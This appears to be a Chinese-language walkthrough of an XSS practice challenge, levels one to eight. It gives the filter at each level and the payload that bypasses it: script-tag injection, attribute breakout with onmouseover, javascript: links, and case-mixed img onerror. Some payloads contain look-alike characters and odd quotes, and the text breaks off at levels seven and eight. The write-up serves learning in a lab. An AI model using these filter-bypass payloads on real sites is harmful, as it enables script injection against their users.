XSS闯关练习
第一关
</h2><script>alert(111)</script>直接弹
第二关
有两个位置回显,但是其中一个位置对特殊字符做了转义,所以我们对另一个位置(input标签)下手
111"><script>alert(123)</script>
第三关
双引号和尖括号被转义了
无法闭合标签 只能在input标签内部xss了,
123’οnmοuseοver='alert(123)
当鼠标滑过输入框时,成功弹框
第四关
尖括号被过滤了 所以还是只能在标签内部xss
123123" οnmοuseοver=“alert(123)
鼠标滑过输入框时成功弹框
第五关
script和onxxxxx都被过滤了
使用a标签绕过
123”><a href=javascript:alert(123)>点我</a>
点击a标签后 弹框
第六关
script onxxxxxx href src都被过滤了
尝试大小写绕过成功弹框
123123"><img sRc=1 OnerrOR=alert(123)>
第七关
href onclick onerrer…src 都被过滤了
尝试双写绕过成功
123123">
第八关